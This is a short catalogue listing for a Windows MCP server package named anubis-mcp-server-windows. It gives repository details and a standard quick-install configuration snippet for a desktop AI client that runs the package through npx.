anubis-mcp-server-windows

AfterlifeSystems/anubis-mcp-server-windows
★ 0 stars Unknown language Memory/Knowledge Updated today
Neural Nexus Model Context Protocol Server For Windows Users
View on GitHub → 🔍 Audit Wallet Slippage →

Quick Install

Copy the config for your editor. Some servers may need additional setup — check the README.

Add to claude_desktop_config.json:

{
  "mcpServers": {
    "anubis-mcp-server-wi": {
      "command": "npx",
      "args": [
        "-y",
        "AfterlifeSystems/anubis-mcp-server-windows"
      ]
    }
  }
}